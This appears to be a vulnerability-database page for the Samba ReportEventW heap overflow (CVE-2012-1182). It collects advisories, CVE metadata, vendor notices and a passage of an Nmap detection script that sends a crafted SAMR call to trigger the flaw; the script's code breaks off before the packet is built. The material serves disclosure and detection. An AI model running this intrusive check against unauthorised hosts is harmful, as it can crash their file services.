ID ZDI-12-072 Type zdi Reporter Anonymous Modified 2012-06-22T00:00:00
Description
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data send in the request Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. Because there is no check to see if 'num_of_strings' is smaller than 'strings' this could result in a heap buffer overflow that could lead to remote code execution.
{"edition": 3, "title": "Samba ReportEventW Heap Overflow Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data send in the request Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. Because there is no check to see if 'num_of_strings' is smaller than 'strings' this could result in a heap buffer overflow that could lead to remote code execution.", "viewCount": 4, "cvelist": ["CVE-2012-1182"], "bulletinFamily": "info", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "id": "ZDI-12-072", "reporter": "Anonymous", "published": "2012-04-18T00:00:00", "references": ["http://www.samba.org/samba/security/CVE-2012-1182"], "lastseen": "2020-06-22T11:40:50", "modified": "2012-06-22T00:00:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1182"]}, {"type": "f5", "idList": ["SOL13719", "F5:K13719"]}, {"type": "nmap", "idList": ["NMAP:SAMBA-VULN-CVE-2012-1182.NSE"]}, {"type": "seebug", "idList": ["SSV:60050"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12328", "SECURITYVULNS:VULN:12426"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0501-2", "SUSE-SU-2012:0504-1", "SUSE-SU-2012:0501-1", "OPENSUSE-SU-2012:0508-1"]}, {"type": "openvas", "idList": ["OPENVAS:71254", "OPENVAS:1361412562310840980", "OPENVAS:136141256231071254", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310123695", "OPENVAS:840980", "OPENVAS:1361412562310850289", "OPENVAS:870584", "OPENVAS:1361412562310864238", "OPENVAS:1361412562310864213"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0515", "ELSA-2012-0465", "ELSA-2013-0506", "ELSA-2012-0478", "ELSA-2012-0466"]}, {"type": "zdi", "idList": ["ZDI-12-063", "ZDI-12-062", "ZDI-12-068", "ZDI-12-069", "ZDI-12-070", "ZDI-12-061", "ZDI-12-064", "ZDI-12-071"]}, {"type": "nessus", "idList": ["FEDORA_2012-6349.NASL", "SL_20120410_SAMBA_ON_SL5_X.NASL", "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0466.NASL", "SOLARIS11_SAMBA_20121016.NASL", "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0466.NASL", "REDHAT-RHSA-2013-0506.NASL"]}, {"type": "ubuntu", "idList": ["USN-1423-1"]}, {"type": "freebsd", "idList": ["BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "fedora", "idList": ["FEDORA:77AFB20FC7", "FEDORA:7D08020F24"]}, {"type": "redhat", "idList": ["RHSA-2012:0465", "RHSA-2013:0515", "RHSA-2013:0506", "RHSA-2012:0478"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2450-1:77F45", "DEBIAN:BSA-070:68853"]}, {"type": "centos", "idList": ["CESA-2013:0506", "CESA-2012:0465", "CESA-2013:0515", "CESA-2012:0466"]}, {"type": "canvas", "idList": ["CVE_2012_1182_NONX"]}, {"type": "cisa", "idList": ["CISA:C73BC9C5DAF991808EA4A267072DA584"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116953"]}, {"type": "exploitdb", "idList": ["EDB-ID:21850"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182"]}], "modified": "2020-06-22T11:40:50", "rev": 2}, "score": {"value": 8.7, "vector": "NONE", "modified": "2020-06-22T11:40:50", "rev": 2}, "vulnersScore": 8.7}, "type": "zdi", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T09:44:39", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "edition": 6, "cvss3": {}, "published": "2012-04-10T21:55:00", "title": "CVE-2012-1182", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:samba:samba:3.0.6", "cpe:/a:samba:samba:3.0.16", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:3.2.14", "cpe:/a:samba:samba:3.4.1", "cpe:/a:samba:samba:3.3.9", "cpe:/a:samba:samba:3.0.23", "cpe:/a:samba:samba:3.4.0", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.2.9", "cpe:/a:samba:samba:3.3.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.2.11", "cpe:/a:samba:samba:3.3.6", "cpe:/a:samba:samba:3.1.0", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:3.0.30", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:3.3.2", "cpe:/a:samba:samba:3.4.9", "cpe:/a:samba:samba:3.2.15", "cpe:/a:samba:samba:3.0.21c", "cpe:/a:samba:samba:3.0.11", "cpe:/a:samba:samba:3.4.12", "cpe:/a:samba:samba:3.0.21b", "cpe:/a:samba:samba:3.0.26a", "cpe:/a:samba:samba:3.4.14", "cpe:/a:samba:samba:3.0.23d", "cpe:/a:samba:samba:3.4.15", "cpe:/a:samba:samba:3.4.5", "cpe:/a:samba:samba:3.0.21", "cpe:/a:samba:samba:3.0.9", "cpe:/a:samba:samba:3.3.3", "cpe:/a:samba:samba:3.0.20b", "cpe:/a:samba:samba:3.2.10", "cpe:/a:samba:samba:3.2.8", "cpe:/a:samba:samba:3.2.5", "cpe:/a:samba:samba:3.0.35", "cpe:/a:samba:samba:3.0.10", "cpe:/a:samba:samba:3.4.8", "cpe:/a:samba:samba:3.4.13", "cpe:/a:samba:samba:3.3.4", "cpe:/a:samba:samba:3.3.1", "cpe:/a:samba:samba:3.3.16", "cpe:/a:samba:samba:3.0.37", "cpe:/a:samba:samba:3.0.15", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:3.2.13", "cpe:/a:samba:samba:3.0.24", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:3.4.10", "cpe:/a:samba:samba:3.0.25c", "cpe:/a:samba:samba:3.4.6", "cpe:/a:samba:samba:3.2.1", "cpe:/a:samba:samba:3.0.34", "cpe:/a:samba:samba:3.0.3", "cpe:/a:samba:samba:3.0.7", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:3.3.0", "cpe:/a:samba:samba:3.0.0", "cpe:/a:samba:samba:3.0.20", "cpe:/a:samba:samba:3.0.25a", "cpe:/a:samba:samba:3.0.1", "cpe:/a:samba:samba:3.0.22", "cpe:/a:samba:samba:3.3.5", "cpe:/a:samba:samba:3.0.23b", "cpe:/a:samba:samba:3.3.11", "cpe:/a:samba:samba:3.0.29", "cpe:/a:samba:samba:3.4.3", "cpe:/a:samba:samba:3.2.2", "cpe:/a:samba:samba:3.0.23a", "cpe:/a:samba:samba:3.0.4", "cpe:/a:samba:samba:3.2.0", "cpe:/a:samba:samba:3.4.4", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:3.3.15", "cpe:/a:samba:samba:3.0.5", "cpe:/a:samba:samba:3.2.4", "cpe:/a:samba:samba:3.3.14", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.0.26", "cpe:/a:samba:samba:3.0.14a", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:3.2.7", "cpe:/a:samba:samba:3.3.12", "cpe:/a:samba:samba:3.0.8", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:3.0.21a", "cpe:/a:samba:samba:3.0.2", "cpe:/a:samba:samba:3.0.14", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:3.2.6", "cpe:/a:samba:samba:3.0.19", "cpe:/a:samba:samba:3.0.2a", "cpe:/a:samba:samba:3.3.8", "cpe:/a:samba:samba:3.4.7", "cpe:/a:samba:samba:3.0.12", "cpe:/a:samba:samba:3.0.23c", "cpe:/a:samba:samba:3.0.27", "cpe:/a:samba:samba:3.0.25", "cpe:/a:samba:samba:3.0.36", "cpe:/a:samba:samba:3.4.11", "cpe:/a:samba:samba:3.0.33", "cpe:/a:samba:samba:3.0.18", "cpe:/a:samba:samba:3.0.13", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:3.0.20a", "cpe:/a:samba:samba:3.0.17", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:3.3.7", "cpe:/a:samba:samba:3.0.28", "cpe:/a:samba:samba:3.2.3", "cpe:/a:samba:samba:3.0.25b", "cpe:/a:samba:samba:3.0.32", "cpe:/a:samba:samba:3.2.12", "cpe:/a:samba:samba:3.3.10", "cpe:/a:samba:samba:3.4.2", "cpe:/a:samba:samba:3.0.31"], "id": "CVE-2012-1182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23d:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:d:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.31:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:13", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently-supported releases for potential vulnerability. To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP AAM| None| 11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nFirePass| None| 6.x \n7.x| None \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 6.x \n5.x| None \nNone \nNone\n\nNone \n\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2016-07-01T23:45:00", "published": "2012-07-10T20:45:00", "href": "https://support.f5.com/csp/article/K13719", "id": "F5:K13719", "title": "Samba vulnerability CVE-2012-1182", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-01T00:00:00", "published": "2012-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/700/sol13719.html", "id": "SOL13719", "title": "SOL13719 - Samba vulnerability CVE-2012-1182", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2019-05-30T17:05:41", "description": "Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182. \n\nSamba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the \"root\" user from an anonymous connection. \n\nCVE-2012-1182 marks multiple heap overflow vulnerabilities located in PIDL based autogenerated code. This check script is based on PoC by ZDI marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray function where an attacker is under control of num_sids and can cause insufficient memory to be allocated, leading to heap buffer overflow and possibility of remote code execution. \n\nScript builds a malicious packet and makes a SAMR GetAliasMembership call which triggers the vulnerability. On the vulnerable system, connection is dropped and result is \"Failed to receive bytes after 5 attempts\". On patched system, samba throws an error and result is \"MSRPC call returned a fault (packet type)\". \n\nReferences: \n\n * https://bugzilla.samba.org/show_bug.cgi?id=8815\n * http://www.samba.org/samba/security/CVE-2012-1182\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 139/tcp open netbios-ssn\n \n Host script results:\n | samba-vuln-cve-2012-1182:\n | VULNERABLE:\n | SAMBA remote heap overflow\n | State: VULNERABLE\n | IDs: CVE:CVE-2012-1182\n | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n | Description:\n | Samba versions 3.6.3 and all versions previous to this are affected by\n | a vulnerability that allows remote code execution as the \"root\" user\n | from an anonymous connection.\n |\n | Disclosure date: 2012-03-15\n | References:\n | http://www.samba.org/samba/security/CVE-2012-1182\n |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182\n\n## Requires \n\n * msrpc\n * smb\n * string\n * vulns\n * stdnse\n\n* * *\n", "edition": 7, "published": "2012-04-21T22:44:23", "title": "samba-vuln-cve-2012-1182 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2018-09-05T21:57:41", "id": "NMAP:SAMBA-VULN-CVE-2012-1182.NSE", "href": "https://nmap.org/nsedoc/scripts/samba-vuln-cve-2012-1182.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n\n\nCVE-2012-1182 marks multiple heap overflow vulnerabilities located in\nPIDL based autogenerated code. This check script is based on PoC by ZDI\nmarked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray\nfunction where an attacker is under control of num_sids and can cause\ninsufficient memory to be allocated, leading to heap buffer overflow\nand possibility of remote code execution.\n\nScript builds a malicious packet and makes a SAMR GetAliasMembership\ncall which triggers the vulnerability. On the vulnerable system,\nconnection is dropped and result is \"Failed to receive bytes after 5 attempts\".\nOn patched system, samba throws an error and result is \"MSRPC call\nreturned a fault (packet type)\".\n\nReferences:\n* https://bugzilla.samba.org/show_bug.cgi?id=8815\n* http://www.samba.org/samba/security/CVE-2012-1182\n\n]]\n\n-----------------------------------------------------------------------\n---\n-- @usage\n-- nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>\n-- @output\n-- PORT STATE SERVICE\n-- 139/tcp open netbios-ssn\n--\n-- Host script results:\n-- | samba-vuln-cve-2012-1182:\n-- | VULNERABLE:\n-- | SAMBA remote heap overflow\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2012-1182\n-- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n-- | Description:\n-- | Samba versions 3.6.3 and all versions previous to this are affected by\n-- | a vulnerability that allows remote code execution as the \"root\" user\n-- | from an anonymous connection.\n-- |\n-- | Disclosure date: 2012-03-15\n-- | References:\n-- | http://www.samba.org/samba/security/CVE-2012-1182\n-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\",\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host,port)\n\n local result, stats\n local response = {}\n\n local samba_cve = {\n title = \"SAMBA remote heap overflow\",\n IDS = {CVE = 'CVE-2012-1182'},\n risk_factor = \"HIGH\",\n scores = {\n CVSSv2 = \"10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\",\n },\n description = [[\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n]],\n references = {\n 'http://www.samba.org/samba/security/CVE-2012-1182',\n },\n dates = {\n disclosure = {year = '2012', month = '03', day = '15'},\n },\n exploit_results = {},\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n samba_cve.state = vulns.STATE.NOT_VULN\n\n -- create SMB session\n local status, smbstate\n status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)\n if(status == false) then\n return false, smbstate\n end\n\n -- bind to SAMR service\n local bind_result\n status, bind_result = 